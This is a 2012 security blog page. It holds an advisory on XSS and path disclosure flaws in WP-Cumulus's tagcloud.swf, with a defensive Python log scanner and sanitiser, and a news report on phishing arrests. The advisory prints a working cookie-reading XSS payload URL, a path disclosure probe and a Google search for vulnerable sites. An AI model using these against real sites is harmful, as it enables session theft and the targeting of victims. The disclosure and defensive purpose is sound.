22 March 2012

Did you know that tagcloud.swf allows Cross-Site Scripting?

I would like to warn you about security vulnerabilities in the WP-Cumulus plugin for WordPress: a full path disclosure and a cross-site scripting (XSS) vulnerability. XSS is a web-application vulnerability that allows attackers to bypass the client-side security mechanisms that modern browsers normally impose on web content. By finding ways of injecting malicious scripts into web pages, an attacker can gain access to sensitive page content, session cookies, and a variety of other information maintained by the browser on behalf of the user.

Full path disclosure (requesting the plugin's PHP file directly, outside of WordPress, produces a PHP error message that includes the file's absolute path on the server):

http://site/wp-content/plugins/wp-cumulus/wp-cumulus.php

XSS:

http://site/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

The tagcloud parameter is XML describing the tags, and the SWF renders each <a> element as a clickable link with the given href without checking its URL scheme, so a javascript: URL is accepted. The script runs only after the victim clicks the injected link, so this is strictly a social-engineering XSS: it needs a click, not just a page load.
There are a lot of vulnerable copies of tagcloud.swf on the Internet (according to Google):

http://www.google.com.au/search?q=filetype:swf+inurl:tagcloud.swf
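As an added example (not code from WP-Cumulus or from this post), here is a Python script that does two things a site owner or Flash developer might want after reading the above: it scans web-server access-log lines for tagcloud.swf requests whose tagcloud= XML carries a link with a script scheme (javascript:, vbscript:, data: and the like, including whitespace-split and entity-encoded spellings), and it shows the input handling a tag-cloud renderer should have had, keeping only http(s) links. The log lines are constructed for the demonstration; the only assumption about the SWF is the one the payload above relies on, that it turns <a href="..."> elements from the tagcloud parameter into clickable links.

```python
"""Detect and neutralise script-scheme links in WP-Cumulus tagcloud XML.

Added example, not code from WP-Cumulus or the original post. The access-log
lines below are constructed; the vulnerable SWF is only assumed to render
<a href="..."> elements from the tagcloud= parameter as clickable links.
"""
import html
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlsplit

# Only these URL schemes are allowed in a tag link; anything else
# (javascript:, vbscript:, data:, ...) may run script when clicked.
SAFE_SCHEMES = {"http", "https"}

HREF_RE = re.compile(r"""href\s*=\s*["']([^"']*)["']""", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def url_scheme(href):
    """Scheme of href, lower-cased. Whitespace and control characters are
    stripped first so ' JavaScript:' or 'java\\tscript:' are not missed.
    Returns '' for a relative link."""
    cleaned = re.sub(r"[\s\x00-\x1f]", "", href)
    m = re.match(r"([A-Za-z][A-Za-z0-9+.\-]*):", cleaned)
    return m.group(1).lower() if m else ""


def is_safe_href(href):
    """Relative links and http(s) links are fine; every other scheme is not."""
    scheme = url_scheme(href)
    return scheme == "" or scheme in SAFE_SCHEMES


def hrefs_in_tagcloud(xml_text):
    """All href values in the tagcloud XML. The XML parser decodes entities,
    so '&#106;avascript:' is seen as 'javascript:'. If the XML is malformed
    (something a lenient Flash parser might still accept) fall back to a
    regex and unescape the values ourselves."""
    try:
        root = ET.fromstring(xml_text)
        return [el.attrib["href"] for el in root.iter("a") if "href" in el.attrib]
    except ET.ParseError:
        return [html.unescape(h) for h in HREF_RE.findall(xml_text)]


def unsafe_hrefs(xml_text):
    """Hrefs in the tagcloud XML whose scheme is neither empty nor http(s)."""
    return [h for h in hrefs_in_tagcloud(xml_text) if not is_safe_href(h)]


def tagcloud_param(url):
    """Decoded tagcloud= parameter of a tagcloud.swf request, or None."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("tagcloud.swf"):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("tagcloud")
    return values[0] if values else None


def scan_log(log_text):
    """One record per log line whose tagcloud= XML carries an unsafe link."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        xml_text = tagcloud_param(m.group(1))
        if xml_text is None:
            continue
        bad = unsafe_hrefs(xml_text)
        if bad:
            hits.append({"request": m.group(1), "unsafe": bad})
    return hits


def sanitize_tagcloud(xml_text):
    """The hardened behaviour a tag-cloud renderer should have: keep relative
    and http(s) links, replace every other href with a harmless '#'.
    Malformed XML is rejected (ParseError) rather than guessed at."""
    root = ET.fromstring(xml_text)
    for el in root.iter("a"):
        if not is_safe_href(el.attrib.get("href", "")):
            el.set("href", "#")
    return ET.tostring(root, encoding="unicode")


# Constructed access-log lines (Apache combined format): the first request is
# the payload from the advisory, the second a legitimate tag link, the third
# the full-path-disclosure probe against the plugin's PHP file.
SAMPLE_LOG = """\
203.0.113.7 - - [22/Mar/2012:10:15:01 +0000] "GET /wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E HTTP/1.1" 200 10123 "-" "Mozilla/5.0"
198.51.100.2 - - [22/Mar/2012:10:16:44 +0000] "GET /wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://site/tag/security/'%3Esecurity%3C/a%3E%3C/tags%3E HTTP/1.1" 200 10123 "-" "Mozilla/5.0"
198.51.100.9 - - [22/Mar/2012:10:17:02 +0000] "GET /wp-content/plugins/wp-cumulus/wp-cumulus.php HTTP/1.1" 200 512 "-" "curl/7.21.0"
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("unsafe tag link(s)", hit["unsafe"], "in", hit["request"])
    print(sanitize_tagcloud("<tags><a href='JavaScript:alert(1)'>x</a>"
                            "<a href='http://site/'>y</a></tags>"))
```

Run against the constructed log, only the first line is reported, with the javascript: href from the advisory's payload. The scheme check normalises case and strips whitespace and control characters before looking at the scheme, because those are the usual ways a javascript: URL is disguised; the sanitiser reuses the same check so that detection and hardening cannot disagree about what counts as safe.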

So to all Flash developers: attend to the security of your Flash files. And to owners of sites with vulnerable Flash files like tagcloud.swf: fix them, or hand the problem to your development team to fix. Note that tagcloud.swf is a static file served straight from the plugin directory, so it stays exploitable for as long as it can be fetched, even with the plugin deactivated; if no fixed version is available to you, removing the file or blocking it at the web server is the simplest mitigation.
 
Kind Regards,
 
Alfredo Cedeno
IT Security Analyst & Advisor
http://ajcborges.blogspot.com 

21 March 2012

Phishing gang steals victim's life savings of $1.6M

The 12 men and two women were detained on Thursday morning in raids in London and the West Midlands. More arrests may follow in the coming days, according to Metropolitan Police Central eCrime Unit (PCeU) head Charlie McMurdie.

"These were dawn raids," McMurdie told ZDNet UK. "Enquiries are still ongoing regarding potential further arrests."

The phishing gang sent out unsolicited emails with links to a fake banking website. It used a series of bank accounts assigned to individual 'money mules' to launder £1m siphoned from the life-savings account of one woman who had divulged her details. The cash was transferred via the internet, the Metropolitan Police said in a statement.

"The stolen money was spent over a three-day period, after suspects embarked on a spending spree during the Christmas sales," the Met said. "The victim, a UK citizen currently living abroad after relocating to care for an ill relative, saw her savings disappear overnight after her bank account details were illegally obtained and unauthorised access to the account was gained."

The suspected 'money mule' launderers received between £9,000 and £75,000 each from the account. All of the 14 suspects were in custody at the time of writing, according to the Met.
 
Around 150 police officers were involved in the operation. They included members of the PCeU, 50 special constables, and police from three regional e-crime hubs in the East Midlands, York and Humber, and the North West.

"We wanted to make the best use of resources in relation to where the suspects were located," McMurdie said.

The police said the "sophisticated" phishing operation highlighted the need for people to take care when doing banking online, warning the public not to click on links in unsolicited emails.

"This is an example of how cybercrime creates real victims through the indiscriminate actions of the criminals involved," Detective Inspector Stewart Garrick said in the PCeU's statement.

Article source: "Dawn raids net 14 suspects in £1m phishing theft", Security Threats | ZDNet UK, http://goo.gl/MYzKu